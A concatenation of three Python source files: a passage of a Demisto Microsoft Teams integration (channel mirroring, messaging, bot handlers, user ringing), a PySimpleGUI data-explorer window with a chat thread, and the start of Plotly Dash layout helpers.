teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = get_integration_context()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '') or demisto.args().get('to', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
raise ValueError('Provide either message or adaptive to send, not both.')
integration_context: dict = get_integration_context()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = get_integration_context()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
integration_context = get_integration_context()
try:
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except json.decoder.JSONDecodeError as json_decode_error:
demisto.error(
f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
f'{str(json_decode_error)}'
)
demisto.debug(f'Cache object: {integration_context}')
demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't found an existing team, adding new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
demisto.debug('Processing POST query...')
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = get_integration_context()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
set_integration_context(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
This is a ring only! no media plays in case the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = get_integration_context()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
user: list = get_user(username_to_call)
if not (user and user[0].get('id')):
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user[0].get('id')
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
while True:
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
server = None
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
if server:
server.stop()
time.sleep(5)
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
'microsoft-teams-create-meeting': create_meeting_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
return_error(f'{str(e)} - {format_exc()}')
if __name__ == 'builtins':
main()
|
des_layout.py
|
import sys
sys.dont_write_bytecode = True
import PySimpleGUI as sg
import matplotlib
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import pandas as pd
import matplotlib.pyplot as plt
import os
import shutil
import glob
import controller.des.exit_button as exit_button
import controller.des.new_button as new_button
import controller.des.chat_button as chat_button
import threading
from threading import Thread
import time
import signal
class des_layout(object):
'''
A class representing a data explorer screen.
Attributes:
window: the window the des gui layout is applied to.
user_manager: an object representing the current user's statuses.
layout: the list of elements comprising the des gui.
components: the elements that comprise the des gui.
controls: the event-triggered controllers linked to the des gui.
figure_agg: the current matplotlib figure.
data_frame: the current pandas dataframe.
data_path: the path of the data source folder.
'''
def __init__(self, user_manager):
'''
The constructor for des_layout.
'''
self.window = None
self.user_manager = user_manager
self.jsnDrop = user_manager.jsnDrop
self.layout = []
self.components = {'components': False}
self.controls = []
self.figure_agg = None
self.data_frame = pd.DataFrame()
self.data_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + "\data_source"
self.chat_count = 0
self.exit_event = threading.Event()
signal.signal(signal.SIGINT, self.signal_handler)
def self_layout(self, **kwargs):
'''
The function to instantiate the elements & layout for des_layout.
'''
sg.theme('Dark Blue 3')
self.components['chatbox'] = sg.Multiline('Chatbox', autoscroll=False, disabled=True, key='chatbox', size=(50,10))
self.components['message'] = sg.Input('', key='message')
self.components['figure_select'] = sg.Button(button_text = 'Select CSV File')
self.components['figure_upload'] = sg.Button(button_text = 'Upload CSV File')
self.components['new_button'] = sg.Button(button_text = 'New DES')
self.controls += [new_button.new]
self.components['chat_button'] = sg.Button(button_text = 'Send')
self.controls += [chat_button.chat]
self.controls += [exit_button.exit]
self.layout = [
[self.components['figure_select'],self.components['figure_upload']],
[sg.Canvas(key='-CANVAS-', size=(450,450))],
[self.components['chatbox']],
[self.components['message'],self.components['chat_button']],
[self.components['new_button']]
]
def draw_figure(self, canvas, figure):
'''
The function to draw the current selected figure for des_layout.
'''
figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)
figure_canvas_agg.draw()
figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)
return figure_canvas_agg
def delete_figure_agg(self):
'''
The function to delete the current figure for des_layout.
'''
if self.figure_agg:
self.figure_agg.get_tk_widget().forget()
plt.close('all')
def signal_handler(self, signum, frame):
'''
The function to set the handler for asynchronous events.
'''
self.exit_event.set()
def set_up_chat_thread(self):
'''
The function to instatiate the chat thread.
'''
self.user_manager.chat_thread = Thread(target=self.chat_display_update,args=([self.user_manager]))
self.user_manager.chat_thread.setDaemon(True)
self.user_manager.stop_thread = False
self.user_manager.chat_thread.start()
def chat_display_update(self, user_manager):
'''
The function to update the chat display for the current des.
'''
time.sleep(2)
if self.window != None:
self.chat_count += 1
result = self.jsnDrop.select("tblChat",f"DESID = '{user_manager.current_screen}'")
if result != "Data error. Nothing selected from tblChat":
messages = ""
sorted_chats = sorted(result,key = lambda i : i['Time'] )
for record in sorted_chats:
new_display = ""
if not (user_manager.latest_time is None):
if record['Time'] > user_manager.latest_time:
new_display = f"{record['PersonID']} : [{record['Chat']}]\n"
else:
new_display = f"{record['PersonID']} : [{record['Chat']}]\n"
messages += new_display
user_manager.chat_list = [messages]
if len(user_manager.chat_list) > 5:
user_manager.chat_list = user_manager.chat_list[:-5]
# Makes a string of messages to update the display
Update_Messages = ""
for messages in user_manager.chat_list:
Update_Messages += messages
# Send the Event back to the window if we haven't already stopped
if not user_manager.stop_thread:
# Time stamp the latest record
if len(sorted_chats) > 1:
latest_record = sorted_chats[:-1][0]
else:
latest_record = sorted_chats[0]
user_manager.latest_time = latest_record['Time']
# Send the event back to the window
self.window.write_event_value('-CHATTHREAD-', Update_Messages)
# The Thread stops - no loop - when the event is caught by the Window it starts a new long task
def render(self):
'''
The function to render the current instance of des_layout.
'''
if self.layout != []:
self.window = sg.Window('Data Explorer', self.layout, size=(750,750), grab_anywhere=False, finalize=True)
def listen(self):
'''
The function to start the event loop for the current instance of des_layout.
'''
if self.window != None:
cont = True
while cont == True:
event, values = self.window.read()
for control in self.controls:
cont = control(event, values, {'view':self}, self.user_manager)
if event == 'Select CSV File':
file_path = sg.PopupGetFile('Please select a data source', file_types=(("CSV Files", "*.csv"),), initial_folder=self.data_path)
if file_path:
self.delete_figure_agg()
self.data_frame = pd.read_csv(file_path).pivot('place', 'group', 'count')
data_plot = self.data_frame.plot(kind='line')
fig = plt.gcf()
self.figure_agg = self.draw_figure(self.window['-CANVAS-'].TKCanvas, fig)
self.user_manager.set_current_DES(os.path.basename(file_path))
self.set_up_chat_thread()
if event == 'Upload CSV File':
file_path = sg.PopupGetFile('Please select a data source', file_types=(("CSV Files", "*.csv"),), initial_folder="C:\\")
if file_path:
if not glob.glob(self.data_path + "\{}".format(os.path.basename(file_path))):
shutil.copy(file_path, self.data_path)
if event == "Exit" :
self.user_manager.stop_thread = True
elif event == "-CHATTHREAD-" and not self.user_manager.stop_thread:
self.user_manager.stop_thread = True
self.window['chatbox'].Update(values[event])
if self.user_manager.stop_thread:
self.user_manager.stop_thread = False
self.set_up_chat_thread()
self.window.close()
|
dash_tools.py
|
from multiprocessing import Process
import numpy as np
import dash
from dash import dcc
from dash import html
import json
import pickle
from plotly_scientific_plots.plotly_misc import jsonify
###Dash wrappers
def dashSubplot(plots,
min_width=18, # min width of column (in %). If more columns, scrolling is enabled
max_width=50, # max width of column (in %).
indiv_widths=None, # can specify list of individual column widths
title='' # str or list of strs
):
if isinstance(title, str):
title = [title]
# remove empty elements of list
plots = [[plt for plt in col if plt != []] for col in plots] # remove empty plots from each column
for i in range(len(plots)-1, -1, -1): # remove empty columns
if plots[i] == []:
plots.pop(i)
if indiv_widths is not None:
indiv_widths.pop(i)
Ncol = len(plots) # number of columns
if indiv_widths is None:
col_width = [min(max_width, max(int(100/Ncol-2), min_width) )] * Ncol
else:
col_width = indiv_widths
title = sum([[i, html.Br()] for i in title], [])[:-1]
col_style = [{'width': str(col_width[i]) + '%',
'display': 'inline-block',
'vertical-align': 'top',
'margin-right': '25px'} for i in range(Ncol)]
plot_divs = html.Div([html.Div(plots[i], style=col_style[i]) for i in range(Ncol)])
title_div = html.H3(title)
layout = html.Div(html.Div([title_div, plot_divs]),
style={'margin-right': '0px', 'position': 'absolute', 'width': '100%'})
return layout
def horizontlDiv(dashlist,
id='L', # either single element or list. If single, id of html divs will be this + # (ie 'L1', 'L2', etc..
width=50): #either total width or list of indiv widths
N = len(dashlist)
if type(width) == int:
indiv_width = [str(int(width/N))+'%'] * N
elif type(width) == list:
indiv_width = [int(w)+'%' for w in width]
else:
print('ERROR: width must either be int or list of ints!')
horiz_div = [html.Div(i, id=id+str(c),
style={'width': indiv_width[c],
'display': 'inline-block',
'vertical-align': 'middle'})
for c, i in enumerate(dashlist)]
return horiz_div
def dashSubplot_from_figs(figs):
n_r = int(np.ceil(np.sqrt(len(figs))))
i_r = 0
i_c = 0
d_plot = [[] for i in range(n_r)]
for fig in figs:
i_c += 1
if i_c >= n_r:
i_r += 1
i_c = 0
da = dcc.Graph(figure=fig, id=' ')
d_plot[i_r].append(da)
i_c += 1
if i_c >= n_r:
i_r += 1
i_c = 0
layout = dashSubplot(d_plot)
return layout
def startDashboardSerial(figs,
min_width = 18, # min width of column (in %). If more columns, scrolling is enabled
max_width = 50, # max width of column (in %).
indiv_widths = None,
host=None, # set to '0.0.0.0' to run as a server. Default val is None (localhost)
title='',
port=8050,
run=True,
):
"""
This starts the dash layout
:param figs: a nested list of plotly figure objects. Each outer list is a column in the dashboard, and each
element within the outer list is a row within that column.
:return:
"""
# convert plotly fig objects to dash graph objects
graphs = []
for c_num, col in enumerate(figs):
g_col = []
for r_num, f in enumerate(col):
if f == []:
g_col += [[]]
elif isinstance(f, dash.development.base_component.Component):
g_col += [f]
else:
if 'meta' in f['layout'] and f['layout']['meta'] is not None:
id = f['layout']['meta']
else:
id = ['row_%d_col_%d' % (r_num, c_num)]
g_col += [dcc.Graph(figure=f, id=id[0])]
graphs += [g_col]
app = dash.Dash()
app.layout = dashSubplot(graphs, min_width, max_width, indiv_widths, title)
if run:
app.run_server(port=port, debug=False, host=host)
return app
def startDashboard(figs,
parr=False, # T/F. If True, will spin seperate python process for Dash webserver
